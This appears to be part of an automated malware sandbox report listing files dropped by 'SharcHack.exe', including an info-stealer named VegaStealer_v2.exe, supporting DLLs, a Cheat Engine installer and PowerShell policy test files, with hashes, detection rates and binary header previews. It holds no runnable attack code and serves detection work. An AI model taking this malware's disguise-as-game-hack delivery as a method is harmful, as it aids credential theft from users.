File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\BouncyCastle.Crypto.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3316968
Entropy (8bit):	6.532906510598102
Encrypted:	false
SSDEEP:	49152:JIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9Y:6BbBWIgWljGxRB/LLY
MD5:	0CF454B6ED4D9E46BC40306421E4B800
SHA1:	9611AA929D35CBD86B87E40B628F60D5177D2411
SHA-256:	E51721DC0647F4838B1ABC592BD95FD8CB924716E8A64F83D4B947821FA1FA42
SHA-512:	85262F1BC67A89911640F59A759B476B30CA644BD1A1D9CD3213CC8AAE16D7CC6EA689815F19B146DB1D26F7A75772CEB48E71E27940E3686A83EB2CF7E46048
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....6Q3...@.................................G&1.O.....2..............\|2.. ....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s..........~....-(....o....o....o.........~....-.~.........~......( ......0..G.......(!....o"....s.1....s,..%..(.... ....o.....o 0...Zo....t....o8(..(......0..$..........(.....(....o.....(!.......io#...z...(....(!....o"...o....(......0............T....r...p.(O....o$....(......0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox.....( ...*V.(&.....}......}..

C:\Users\user\AppData\Local\Temp\CheatEngine75.exe

Download File

Process:	C:\Users\user\Desktop\SharcHack.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30016928
Entropy (8bit):	7.994332959692821
Encrypted:	true
SSDEEP:	786432:Bl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHn:Bl3LMEXFhV0KAcNjxAItj
MD5:	CCEF241F10766A2E12298FBA4D319450
SHA1:	955C0A80105B034ED46941845FC9BDBE8187EE64
SHA-256:	590D28762BC431046A202D7BBAFB31F93FBBBC73A3C2291119B5C1139675B579
SHA-512:	D20A8F5AFAB8CD819AB81875BA9DBA5C5EBB9CEADF4D53BF19E1E99C4F16D1361AA272F49571C69C6CC375AFC8AC2F9C2E0293B5F2BF62F85CC5C23DFB3923F2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................R...^.......^.......p....@.......................................@......@...................@....... .......p...................+...................................`......................."..T....0.......................text....9.......:.................. ..`.itext.......P.......>.............. ..`.data....7...p...8...V..............@....bss.....m...............................idata....... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................

C:\Users\user\AppData\Local\Temp\EntityFramework.SqlServer.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	586632
Entropy (8bit):	6.059056255747647
Encrypted:	false
SSDEEP:	6144:Pbfapjp4pWVWvFdpxhGOdBB6OHK1ivk4PQG2puGeqVmjaVmnS4bfu65B:P7usAOvphbu65
MD5:	F32CE9A5A866313D1A3391AA42153F4A
SHA1:	7404383A681A2EC1C5BF24152FA298E934F53783
SHA-256:	4583F9D1E62C90E3BC41D9FEACCA8152E3BB067B767E806872772EA9A55803E9
SHA-512:	A276ED47E0687699E844DFB8215B4EF922EB6B853D7CA4BBF707B4439C26F8AFC6886F00AF0B3BA76E2DD322A0870594D81BCDC2095656A2E5B78568DC5F3F51
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... .......................@......k$....`.....................................O.......t................#... ..........T............................................ ............... ..H............text...X.... ...................... ..`.rsrc...t...........................@..@.reloc....... ......................@..B........................H............................]..l.........................................{,.....{-...V.(......},.....}-......0..;........u......,/(/....{,....{,...o0...,.(1....{-....{-...o2..... #'p )UU.Z(/....{,...o3...X )UU.Z(1....{-...o4...X.0..X........r...p......%..{,............-.&.+.......o5....%..{-............-.&.+.......o5....(6...V.(7.....(......(......{...."..}......{...."..}....:.(......}......J.......s8...(...+J.......s9...(...+*........s:...(...+%-.&.......s:.

C:\Users\user\AppData\Local\Temp\EntityFramework.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4773480
Entropy (8bit):	6.084582408535823
Encrypted:	false
SSDEEP:	49152:Ifl9Yy1hblT0KVDuv06QBhBiMyHBzwFRdH:IkutRVDuv06QbBisF
MD5:	00D48A062EF3DFFBA05159D019CF427D
SHA1:	4BA6DB0470C776423D73438894207B1D6F1E7B5D
SHA-256:	7E60999A5741B9B041D3A8D9BAD1C952E4CCE8216142327AB413B1DDCA70A4C5
SHA-512:	14B4F20F87B72C8BB0F129FDFA1B865DBC63E49B6FF763D29516AD7B235288FB959BD35609BAA3FD80E07BE4FBEB120EAAE475B7628A85D6CBC0110A442D39CE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y]............" ..0...H........../H.. ....H...... ....................... I......AI...`...................................H.O.....H.$.............H.h$....I......-H.T............................................ ............... ..H............text.....H.. ....H................. ..`.rsrc...$.....H.......H.............@..@.reloc........I.......H.............@..B..................H.....H.............'.........d.>.....\-H.......................................{".....{#...V.($.....}".....}#......0..;........u......,/(%....{"....{"...o&...,.('....{#....{#...o(..... dL.. )UU.Z(%....{"...o)...X )UU.Z('....{#...o...X.0..X........r...p......%..{"............-.&.+.......o+....%..{#........w...-.&.+...w...o+....(,.....{-.....{....V.($.....}-.....}.......0..;........u......,/(%....{-....{-...o&...,.('....{.....{....o(....*. ...z )UU.Z(%....{-...o)...X )UU

C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	584976
Entropy (8bit):	5.91011541005501
Encrypted:	false
SSDEEP:	6144:1cHfLcN/a4L/uhxq9UVFYHjL3VMsWn1s6QjRhF9gauyBuntfV+jPuxJk:1cTcVa4Lwxqc4jL3VKQjRhFjBDjPuxJk
MD5:	169B6D383B7C650AB3AE2129397A6CF3
SHA1:	FCAEF7DEFB04301FD55FB1421BB15EF96D7040D6
SHA-256:	B896083FEB2BDEDC1568B62805DBD354C55E57F2D2469A52AEC6C98F4EC2DEDF
SHA-512:	7A7A7BDB508B8BF177249251C83B65A2EF4A5D8B29397CAB130CB8444B23888678673A9A2E4B1C74CC095B358F923B9E7E5A91BFA8C240412D95765851F1DD87
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ........... ....................... ......$.....@.....................................O......................../..............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........o...`..................x.........................................(......(....^.(...........%...}....:.(......}....:.(......}......(....:.(......}......{......(......(....:.(......}......{.....(.............}.....(......{.....X.....}......0...........-.~.....~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..\|....(......._..{........+,..{e....3...{d......(....,...{d.....{f.......-.....0...........-.r...ps....z.o......-.~.....~....

C:\Users\user\AppData\Local\Temp\SQLite.Interop.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1402032
Entropy (8bit):	6.88401160982436
Encrypted:	false
SSDEEP:	24576:dMDaUv84L2G9qOzAMmMt9MXakDg+XoP2STgVUrrKfw/Rhngqno:dfW9GMvMX9onGAXno
MD5:	0A1E95B0B1535203A1B8479DFF2C03FF
SHA1:	20C4B4406E8A3B1B35CA739ED59AA07BA867043D
SHA-256:	788D748B4D35DFD091626529457D91E9EBC8225746211086B14FB4A25785A51E
SHA-512:	854ABCCA8D807A98A9AD0CA5D2E55716C3CE26FAE7EE4642796BAF415C3CFAD522B658963EAFE504ECAED6C2ECDCDF332C9B01E43DFA342FCC5CA0FBEDFE600E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........KA...A...A...Z/m.a...Z/X.}...Z/l....H.U.I..._.U.B...A......Z/h.@...Z/].@...Z/\.@...Z/[.@...RichA...................PE..L...6.c...........!.........:.......4.......................................`......7.....@..........................#..:...t...x........................T..........p...............................@...@...............(............................text............................... ..`.rdata..*M.......N..................@..@.data....t...@...T...$..............@....rsrc................x..............@..@.reloc..h...........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	208560
Entropy (8bit):	6.124592164027391
Encrypted:	false
SSDEEP:	3072:wP46KP8cdA0TEocO+zaZ9W3+wLLexyLKHxLj:k46KP8c+0Qs
MD5:	162E50541954D792420156956B09D410
SHA1:	F10943992EAD2DD222DF7CCFC76D74D495EF086D
SHA-256:	20D7E37FEDCE140669E2A2D89F4E7A67405134CA1876A55F9CF9AB0EAE8F206E
SHA-512:	A86167344C9645387B6B0C95AB19F2ADFEE5573AB2C6068E38E3DE0B94990379A948F0E10214B6F7DCF1F5E3159032217113267B8A7B4365F19BA970A8A51BF9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .c...........!..................... ........... .......................@......<.....@.................................l...O........................T... ......4................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H......../..................n...P .........................................pf.P.Y@.....D.8.Y..s.1.z#..../.....`.ZpW..45....F..W.K.(......... r24..6.5.....\.......5.9_e.eX..X......6.m.rp.M.'...(.....0..3.......~.....(...., r...p.....(....o....s...........~.....~...........V(....r=..p~....o....V(....ri..p~....o.......0..6.......~....s.........o.........r...ps......r...po....&.o ...o!....o"....o#...&...r...po....&.o$...o%.....+D..o&...t......,...+..r...po....&.o'

C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	208568
Entropy (8bit):	6.1218954888666905
Encrypted:	false
SSDEEP:	1536:7yuS8cGzz6KP8cp1x+PAaDOEzxOkqabge94h0Ero7v6PxlcU7vtPCjRTZPxB:7PX6KP8cp1kYcOnnaZ9W3roLGxPL2Xx
MD5:	355BBEA5EE15D806E0D6BD6DBD25F494
SHA1:	B41EBF0FF5C4EFFA1FD123845EFE03764E91341E
SHA-256:	8E2AE9D4A03E95C714D7835310795B7E0434B8AA3448E6A5B106AD9DBBA0158F
SHA-512:	AD453A26A22EFB522126208A1E7EBEE6EC429FDE52F4A3D30212EF9F58E39714FD7F42D05031BF31992199AEA573F9F1887DC83ED30093527D3E8B33476A4387
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c...........!................>.... ........... .......................@......C8....@.....................................W........................T... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H......../..................n...P ......................................[...HD..0iU.....h..Y#...D.m..Ze...W.fj....~..9>..u.Q=...5P.9sw....~...Cg......c..X.....~..}....:@Gk...M..i,...`R....Z[-q.}.M..(.....0..3.......~.....(...., r...p.....(....o....s...........~.....~...........V(....r=..p~....o....V(....ri..p~....o.......0..6.......~....s.........o.........r...ps......r...po....&.o ...o!....o"....o#...&...r...po....&.o$...o%.....+D..o&...t......,...+..r...po....&.o'

C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	420528
Entropy (8bit):	6.162571798892841
Encrypted:	false
SSDEEP:	12288:OPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc1v:g6hetBJm333M8EGAB
MD5:	056D3FCAF3B1D32FF25F513621E2A372
SHA1:	851740BCA46BAB71D0B1D47E47F3EB8358CBEE03
SHA-256:	66B64362664030BFF1596CDA2EC5BD5DF48CC7C8313C32F771DB4AA30A3F86F9
SHA-512:	CE47C581538F48A46D70279A62C702195BEACBFAFB48A5A862B3922625FE56F6887D1679C6D9366F946D3D2124CB31C2A3EACBBD14D601EA56E66575CDF46180
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c...........!.................+... ...@....... ...................................@.................................d+..W....@..p................T...`......,............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................+......H............M..........PM..J...P .......................................e...y....M.Yh~..Pb...q.q...+t.T.d.........v..Fq...:....unR.a5..Y.>...d.:.....Kuq.U9...d...K..d....K..E.$uh...a....1...w.:.(......}......{....:.(......}......{....r.(......}......}......}......0..5........-..~.....o.....X...v....~.......o......o .........6..(....(...."..(.....0..T........~!...("...-..-.~#...../....+...X....($...-..-.~#.....v........(%...~.......o&...Z.~....2..~.........

C:\Users\user\AppData\Local\Temp\VegaStealer_v2.exe

Download File

Process:	C:\Users\user\Desktop\SharcHack.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8068096
Entropy (8bit):	7.905088140781816
Encrypted:	false
SSDEEP:	98304:Rgl47z3Aldea5a/OhtJeq+4NK+dG7M0mWZsE6+YhU+dbkh4yiMP0Q:H/wld79ht+j1M0mWZsE6+YASy10Q
MD5:	9F4F298BCF1D208BD3CE3907CFB28480
SHA1:	05C1CFDE951306F8C6E9D484D3D88698C4419C62
SHA-256:	BF7057293D871CAC087DAAB42DAF22C1737A1DF6ADC7B7963989658F3B65F4CC
SHA-512:	4C763C3B6D4884F77083DB5CCADA59BC57803B3226294EFF2EC3DB8F2121AC01EE240B0E822CB090F5320CE40DF545B477E323EFABDBCA31722731ADC4B46806
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Q......................{.............. ....@...........................\|.............................................. ..P.......d.z.......................................................................... ...............................text...&........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...d.z.......z.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x5p1urs.orv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yn52u5p.xjo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cmxlrcsk.4et.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eldjul3t.smk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyho5s3q.30b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kccdzl4p.o44.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nicnpaqt.nzd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tizphclw.2ln.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x2ezyevv.jnj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkkutqvi.tbk.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\a48cd90a-3f57-44df-8f36-0b88c5d4fb9a

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\a48cd90a-3f57-44df-8f36-0b88c5d4fb9a-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\CheatEngine75.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27406384
Entropy (8bit):	7.993410954401878
Encrypted:	true
SSDEEP:	786432:37YPcmlabhBx9CrdUxTvngF7oUNUQWQu7pquEKLR:rGTabv+CVYhoLXQ8BR
MD5:	E0F666FE4FF537FB8587CCD215E41E5F
SHA1:	D283F9B56C1E36B70A74772F7CA927708D1BE76F
SHA-256:	F88B0E5A32A395AB9996452D461820679E55C19952EFFE991DEE8FEDEA1968AF
SHA-512:	7F6CABD79CA7CDACC20BE8F3324BA1FDAAFF57CB9933693253E595BFC5AF2CB7510AA00522A466666993DA26DDC7DF4096850A310D7CFF44B2807DE4E1179D1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................R...^.......^.......p....@.................................".....@......@...................@....... .......p..................k...................................`......................."..T....0.......................text....9.......:.................. ..`.itext.......P.......>.............. ..`.data....7...p...8...V..............@....bss.....m...............................idata....... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc........p......................@..@....................................@..@........................................................

C:\Users\user\AppData\Local\Temp\is-3E079.tmp\RAV_Cross.png (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-O39K6.tmp\CheatEngine75.tmp
File Type:	PNG image data, 700 x 360, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	75974
Entropy (8bit):	7.973739579566582
Encrypted:	false
SSDEEP:	1536:cyfQCzB7fBVwtW5EGtWO7Cemktbbv36SEOW9izF:cyfJ/2WXz7Fbbf61OW9aF
MD5:	CD09F361286D1AD2622BA8A57B7613BD
SHA1:	4CD3E5D4063B3517A950B9D030841F51F3C5F1B1
SHA-256:	B92A31D4853D1B2C4E5B9D9624F40B439856D0C6A517E100978CBDE8D3C47DC8
